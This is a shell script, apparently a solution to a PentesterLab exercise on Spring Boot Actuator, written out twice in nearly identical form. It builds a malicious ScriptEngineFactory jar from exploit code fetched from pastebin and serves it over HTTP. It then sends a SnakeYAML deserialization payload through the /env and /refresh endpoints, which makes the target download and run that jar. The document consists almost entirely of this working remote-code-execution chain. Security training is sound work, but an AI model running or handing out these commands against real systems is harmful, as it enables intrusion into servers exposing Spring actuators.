YasserGersy/pentesterlab.com___spring-actuators.sh

## pentesterlab.com___spring-actuators.sh
mkdir src
mkdir src/META-INF
mkdir src/META-INF/services
curl https://pastebin.com/raw/XbCvxXT6 -o src/ExploitScriptEngineFactory.java
echo 'ExploitScriptEngineFactory'  > src/META-INF/services/javax.script.ScriptEngineFactory

docker run -it -v `pwd`:/code openjdk /bin/bash

cd /code
javac -source 1.8 -target 1.8 src/ExploitScriptEngineFactory.java
ls src/

jar -cvf test.jar -C src .
ls
exit
cp test.jar server
cd server
echo '!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://SERVER/test.jar"] ]] ]' > test.yml
ruby -run -e httpd . -p 80


curl -i -s -k -X $'POST' \
    -H $'Host: bulnerable.libcurl.so' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' -H $'Connection: close' \
    $'http://vulnerable.libcurl.so/env?spring.cloud.bootstrap.location=http://SERVER/test.yml'

curl -i -s -k -X $'POST' \
    -H $'Host: vulnerable.libcurl.so' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 0' \
    $'http://vulnerable.libcurl.so/refresh'
	mkdir src
	mkdir src/META-INF
	mkdir src/META-INF/services
	curl https://pastebin.com/raw/XbCvxXT6 -o src/ExploitScriptEngineFactory.java
	echo 'ExploitScriptEngineFactory' > src/META-INF/services/javax.script.ScriptEngineFactory

	docker run -it -v `pwd`:/code openjdk /bin/bash

	cd /code
	javac -source 1.8 -target 1.8 src/ExploitScriptEngineFactory.java
	ls src/

	jar -cvf test.jar -C src .
	ls
	exit
	cp test.jar server
	cd server
	echo '!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://SERVER/test.jar"] ]] ]' > test.yml
	ruby -run -e httpd . -p 80


	curl -i -s -k -X $'POST' \
	-H $'Host: bulnerable.libcurl.so' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: /' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' -H $'Connection: close' \
	$'http://vulnerable.libcurl.so/env?spring.cloud.bootstrap.location=http://SERVER/test.yml'

	curl -i -s -k -X $'POST' \
	-H $'Host: vulnerable.libcurl.so' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: /' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 0' \
	$'http://vulnerable.libcurl.so/refresh'